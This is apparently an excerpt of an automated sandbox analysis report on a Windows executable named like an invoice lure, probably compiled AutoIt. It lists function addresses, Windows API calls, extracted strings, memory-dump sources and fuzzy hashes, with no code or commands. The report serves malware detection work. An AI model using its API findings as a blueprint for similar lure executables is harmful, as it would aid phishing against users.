                    • Instruction ID: e9447b01ea723bcb75d7669876113a8b86bdd1706a3f689aa54af1f3d0fba427
                    • Opcode Fuzzy Hash: 95d6a46f17b65a7dc4830f4f234c363c987afd3d78c9bc02f9f3bae27cdf5e5d
                    • Instruction Fuzzy Hash: 291190713002086FEF119E54DC90EBB376AEB583A4F10412BF918D73A1D6799C528BA8
                    Function 004DDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • GetActiveWindow.USER32 ref: 004DDA7B
                    • EnumChildWindows.USER32(?,004DD75F,00000000), ref: 004DDAF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ActiveChildEnumLongWindows
                    • String ID: T1L
                    • API String ID: 3814560230-767776119
                    • Opcode ID: 0bc5cf83836b1c365ecba7eb34b8839635ccb3c129de88b3a6f5544a5a9dd915
                    • Instruction ID: dd023729fe3266f991600f697eee9245d3481589125da9ddf1d865a76ed1b05f
                    • Opcode Fuzzy Hash: 0bc5cf83836b1c365ecba7eb34b8839635ccb3c129de88b3a6f5544a5a9dd915
                    • Instruction Fuzzy Hash: 2C213935604601DFC714DF78D861AA677E5FB59320F25061FE86A8B3E0DB34A805DB68
                    Function 004D98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                      • Part of subcall function 0048D17C: GetStockObject.GDI32(00000011), ref: 0048D1CE
                      • Part of subcall function 0048D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    • GetWindowRect.USER32(00000000,?), ref: 004D9968
                    • GetSysColor.USER32(00000012), ref: 004D9982
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 6b0959814d2d9ded3da7a60e045a0532dec68a7e01d78f858da4e82a1f721284
                    • Instruction ID: f7458040597cde25af4761ca4b6a0c31a0c511f41286efe3b7b5a06936d1d64d
                    • Opcode Fuzzy Hash: 6b0959814d2d9ded3da7a60e045a0532dec68a7e01d78f858da4e82a1f721284
                    • Instruction Fuzzy Hash: C31129B2510209AFDB04DFB8CC55AFA7BA8FF09344F01562EF955E2250D738E851DB54
                    Function 004D9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 004D9699
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004D96A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: 4c9c849215858e307a9c66b9d48ee1e050409f0aaed7367c566b97b22c221001
                    • Instruction ID: 7c65577dc7b7d4404422d8dc899054e6177cc8531e99060e8df0782e6d0890d9
                    • Opcode Fuzzy Hash: 4c9c849215858e307a9c66b9d48ee1e050409f0aaed7367c566b97b22c221001
                    • Instruction Fuzzy Hash: 45116A71500108AAEF105FA4DC64AEB3B6AEB15378F104726F965D73E0C739DC51A768
                    Function 004B5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004B52D5
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004B52F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 9d61ecd403c24673c3ff1b1895cb2f71c5b1bbf91ff30df427d450314c989bcc
                    • Instruction ID: 46c84e44c654738cd7dbe04d782caec403932f77bd9b273ec41a020d9d5ec42e
                    • Opcode Fuzzy Hash: 9d61ecd403c24673c3ff1b1895cb2f71c5b1bbf91ff30df427d450314c989bcc
                    • Instruction Fuzzy Hash: 7E11D072901A14ABDB24DAB8D904BDEF7E8AB05750F080066ED01A7390D3B4ED06CBB9
                    Function 004C4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004C4DF5
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004C4E1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 9cf5437c7b7e853a5ae7cb57638715ceca6f643c77b7580abf7ea62cdb9d2ce6
                    • Instruction ID: 755b7424b67f5b8e8db3130b834bd95fe1b6d871453318c6b2a71d77906506ff
                    • Opcode Fuzzy Hash: 9cf5437c7b7e853a5ae7cb57638715ceca6f643c77b7580abf7ea62cdb9d2ce6
                    • Instruction Fuzzy Hash: 2D11CE78500221BADB649F5188A8FFBFAA9FF46351F10822FF50686240D2786941C6F4
                    Function 0049A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004A37A7
                    • ___raise_securityfailure.LIBCMT ref: 004A388E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: (S
                    • API String ID: 3761405300-2396237897
                    • Opcode ID: cf377e35726f4bfd668eb1646971038f42a0143289ce372d8cab311a3d9f9ecf
                    • Instruction ID: e6efdec580cafded971f8e4912cd14e4937a72909787175a01cc072c0e2b166f
                    • Opcode Fuzzy Hash: cf377e35726f4bfd668eb1646971038f42a0143289ce372d8cab311a3d9f9ecf
                    • Instruction Fuzzy Hash: C52168B5200304CBE710DF55F9A56013BF8BB29310F10A86AE5048B7E0E3F4A988FF49
                    Function 004CA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                    Download Yara Rule
                    APIs
                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 004CA84E
                    • htons.WSOCK32(00000000,?,00000000), ref: 004CA88B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: htonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 3832099526-2422070025
                    • Opcode ID: f056e614d3b055f0e898019945990661956a58d0b92deaf364bb1d7c08aed18f
                    • Instruction ID: ac325fa9320c77c8878f63aa242d1729abbc200c32ef2d288ac7e16114bb986a
                    • Opcode Fuzzy Hash: f056e614d3b055f0e898019945990661956a58d0b92deaf364bb1d7c08aed18f
                    • Instruction Fuzzy Hash: 5D010479200308ABCB10EF68C886FA9B364EF05718F10842FF5169B3D1C739E821C76A
                    Function 004AB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004AB7EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: 82a459086beef39f9168cdc2017857ae3914477436a9560d3e22c18924a2b58b
                    • Instruction ID: a3e23b8a4a69dd48ad2a53d98b0170194daf5ac5cc8bab4ce363ea355915b0df
                    • Opcode Fuzzy Hash: 82a459086beef39f9168cdc2017857ae3914477436a9560d3e22c18924a2b58b
                    • Instruction Fuzzy Hash: 72012875A00114BBDB04EBA4DC429FE336AFF27314B00061EF462932C2EB78580887A8
                    Function 004AB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 004AB6EB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: 6f9f19c6cce7e0e58500d47bfb4092ddd08af6f69ae40f905a58e73a990169b2
                    • Instruction ID: 776a3142131d4a9b98a7151e5a98bd7f50c88b238f92f7d7470c51c53eac2337
                    • Opcode Fuzzy Hash: 6f9f19c6cce7e0e58500d47bfb4092ddd08af6f69ae40f905a58e73a990169b2
                    • Instruction Fuzzy Hash: 0B018475A41004BBDB04EBA5D952BFF73A9DF27344F10401EB402A32C2EB585E1897EA
                    Function 004AB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 004AB76C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: ComboBox$ListBox
                    • API String ID: 3850602802-1403004172
                    • Opcode ID: 1085736dd6a27774c3ca5d086f27d8c2fde0ab637d1a285bc11b885d075ce628
                    • Instruction ID: 515ef73eac813bf18956b6d8a70f5ce33345b12d8a9302c44f6ae0530cf7b1e2
                    • Opcode Fuzzy Hash: 1085736dd6a27774c3ca5d086f27d8c2fde0ab637d1a285bc11b885d075ce628
                    • Instruction Fuzzy Hash: CD01A779A40104BBDB00E7A4D952AFF73AD9F27344F50401EB402B3192EB985E1987F9
                    Function 00494D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: "S
                    • API String ID: 3494438863-2984366834
                    • Opcode ID: a2ecc2e9b70fca7badb49a7f77e19e0aaca8d1806390abc4b63a8ffa2a795b83
                    • Instruction ID: 5474d52bac0c1be23e6bf051b228122a8d8802566c9712ea45b633971ab27e26
                    • Opcode Fuzzy Hash: a2ecc2e9b70fca7badb49a7f77e19e0aaca8d1806390abc4b63a8ffa2a795b83
                    • Instruction Fuzzy Hash: C0F0C879209A115AEB149B59FC51E676FD4FB64764F10023FF204CA384E738C8435B99
                    Function 00474024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00470000,00000063,00000001,00000010,00000010,00000000), ref: 00474048
                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,004B67E9,00000063,00000000,75A90280,?,?,00473EE1,?,?,000000FF), ref: 004E41B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: EnumImageLoadNamesResource
                    • String ID: >G
                    • API String ID: 1578290342-1296849874
                    • Opcode ID: 45e21f6cae4c71a041587b1aca3572d897446e6333d2251df7d4dbd039e68508
                    • Instruction ID: 0c568351fc0575fb710a0af91748b29c9b4658e72fdf68d49025b23229df8517
                    • Opcode Fuzzy Hash: 45e21f6cae4c71a041587b1aca3572d897446e6333d2251df7d4dbd039e68508
                    • Instruction Fuzzy Hash: 31F06D31640754B7E6204B2AAC4AFE23AA9E765BB5F104506F214AA2D0D3E49194EAEC
                    Function 004B7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: c0d83d273308a5156c52328c223eaec60b56710f23fbaf4948332dfe56aca2cb
                    • Instruction ID: 5076256de13d3eb05ff916d81671356dc5e791e5288d143172f44358bf3a5b66
                    • Opcode Fuzzy Hash: c0d83d273308a5156c52328c223eaec60b56710f23fbaf4948332dfe56aca2cb
                    • Instruction Fuzzy Hash: 83E09277A0422527DB10AAA6AC49ED7FFACAB91764F01006AB905D3181D668A605C7E4
                    Function 004AA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004AA63F
                      • Part of subcall function 004913F1: _doexit.LIBCMT ref: 004913FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 56b81112fa89af1d80a95150fe3142abedc5722548910c250ce587eb20127e68
                    • Instruction ID: 9788727f4bf76b0a4e500f46e75eab2c6aa042f2a7904ae8268ca8f5034449e2
                    • Opcode Fuzzy Hash: 56b81112fa89af1d80a95150fe3142abedc5722548910c250ce587eb20127e68
                    • Instruction Fuzzy Hash: C8D05B313C432833E21436997C17FDD79489F15B55F04442BBF0C955D349DA969042ED
                    Function 004EAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemDirectoryW.KERNEL32(?), ref: 004EACC0
                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 004EAEBD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: DirectoryFreeLibrarySystem
                    • String ID: WIN_XPe
                    • API String ID: 510247158-3257408948
                    • Opcode ID: e8dc4ca871ea50c98923e1f3f5f1cf2ffb92e1fd52a87ce4f1a5eb90e0364113
                    • Instruction ID: 71fe41909f48761e635a25e8e59bf1b8c1b738b0e53a10f663c3753543424ae9
                    • Opcode Fuzzy Hash: e8dc4ca871ea50c98923e1f3f5f1cf2ffb92e1fd52a87ce4f1a5eb90e0364113
                    • Instruction Fuzzy Hash: D2E0E570C00549DFCB11DBA6D9449EDB7B8AB58301F2480D7E112B2660D7746A95DF2A
                    Function 004D86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D86E2
                    • PostMessageW.USER32(00000000), ref: 004D86E9
                      • Part of subcall function 004B7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 36b1708e3a8956df1d47da92078f24e39bb343a60c3af80501d684ab1bf54d2c
                    • Instruction ID: 958b4f5651b1ce7ecfa1fdf42f6a4670c4448d1c94577d88f25bfe65e196154f
                    • Opcode Fuzzy Hash: 36b1708e3a8956df1d47da92078f24e39bb343a60c3af80501d684ab1bf54d2c
                    • Instruction Fuzzy Hash: 57D0C9317853247BF3656770AC0BFD67A59AB49B11F100829B649EA1D0C9A4A950C668
                    Function 004D8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004D86A2
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004D86B5
                      • Part of subcall function 004B7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004B7AD0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 1bd3c7405a98666d4afab5f0d38d87c8a01855229576a4ff055cae6a030da5c5
                    • Instruction ID: 464797ce15f72da5e30cf9846953eb1163eb08261301cbc93442695cf3757e96
                    • Opcode Fuzzy Hash: 1bd3c7405a98666d4afab5f0d38d87c8a01855229576a4ff055cae6a030da5c5
                    • Instruction Fuzzy Hash: 59D0C931784324B7E3646770AC0BFD67E59AB44B11F100829B649AA1D0C9A4A950C668